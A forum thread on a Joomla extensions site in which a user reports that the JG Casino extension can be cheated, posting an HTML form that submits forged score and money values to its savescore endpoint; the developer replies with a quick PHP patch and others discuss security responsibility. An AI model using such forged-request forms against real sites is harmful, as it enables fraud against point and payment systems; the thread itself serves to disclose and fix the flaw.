Joomla Gaming

The Gaming extensions for Joomla!

  • Increase font size
  • Default font size
  • Decrease font size
Home Forum
Welcome, Guest
Username Password: Remember me
Forgot your password? Forgot your username? Create an account
Forum
Main Forum
Bugs

more exploits
(1 viewing) (1) Guest
Reply Topic
New Topic
  • Page:
  • 1

TOPIC: more exploits

more exploits 2 years ago #1401

  • TNQ
  • OFFLINE
  • Fresh Boarder
  • Posts: 2
  • Points: 10000
Hello again..

exploits exploits exploits!!!

okay, my story!

i run a site, that usually takes money for certain services.
we recently decided to use alphauserpoints for our virtuemart shop, and JG casino to go with that.
We are sadly tempted to delete the JG casino due to waay to many exploits. No offence to the creator, this is a really nice thing, but not when we are handling money and stuff like so.

the first found exploit!

<form action="http://www.tnq.dk/index.php?autocom=casino&do=savescore" method="post">
<input type="hidden" name="enscore" value="88800" />
<input type="hidden" name="gcasino" value="blackjack" />
<input type="text" name="gmoney" value="150" />
<input type="submit" value="Get points!" />
</form>
Reply Quote

Re:more exploits 2 years ago #1402

  • Vanama
  • OFFLINE
  • Administrator
  • Posts: 712
  • Points: 5063069
I'm sorry, but I am human only.

I was think security works, but I was not test it.

Here is first quick fix.


Find the following code in cashout.php file

 
			if ($dbrow[0] == "") {
      $playtime = 0;
      } 
 


and replace it with

 
			if ($dbrow[0] == "") {
        $playtime = 0;
			  return "baddata";        
      } 
 


I will create more security in future.
Like You My Extensions? Please donate.
Please vote my extensions here. Thanks!
Reply Quote

Re:more exploits 2 years ago #1458

  • ssnobben
  • OFFLINE
  • Fresh Boarder
  • Posts: 9
  • Points: 9930
Well this hindering many of us to start using this nice dev you have going here so dont give up but the security is very very important if you start hazzeling with users money and transactions.

Nice about its integrated with Alphauserpoints no ? Thats great so hope to see some progress and that all these security issues are overseen of the main dev so people can feel more secure to go for this solution.

All the best!
Reply Quote

Re:more exploits 2 years ago #1461

  • Twinkiez
  • OFFLINE
  • Expert Boarder
  • Webmaster of Sliceofmymind.com
  • Posts: 95
  • Points: 15250
The security of any website is 3 parts webmaster, one part developer. That is if you choose to become a website owner (webmaster), you should have some basic knowledge of web development and its development languages like php. Relying on others, especially third-party developers for help is a big "no-no". I'm assuming by your rough English your website isn't English based and by your choice to allow people to use real money.

Honestly, the JG Casino and Alphauserpoints extensions were never developed for true online gambling endeavors. It is great that you can combine these two extensions to create a "makeshift" casino, but a lot of work must be done if you want to go the commercial route. That is where having a fundamental knowledge of development languages like php comes in.

If your users can't behave, try using a strict Daily Win Limit.
Voice your opinions, earn points and then redeem points for products, prizes and more. Sliceofmymind.com - The Opinion Habitat
Reply Quote

Re:more exploits 2 years ago #1465

  • ssnobben
  • OFFLINE
  • Fresh Boarder
  • Posts: 9
  • Points: 9930
True I am not English speaking guy but I have done a english Joomla site now as website owner.

Just released here Travelmate.com -world wide travel community !

any tips appreciated!

Thanks!
Last Edit: 2 years ago by ssnobben.
Reply Quote
Reply Topic
New Topic
  • Page:
  • 1
Forum
Main Forum
Bugs
Moderators: Tinker
Powered by Kunena
Time to create page: 0.74 seconds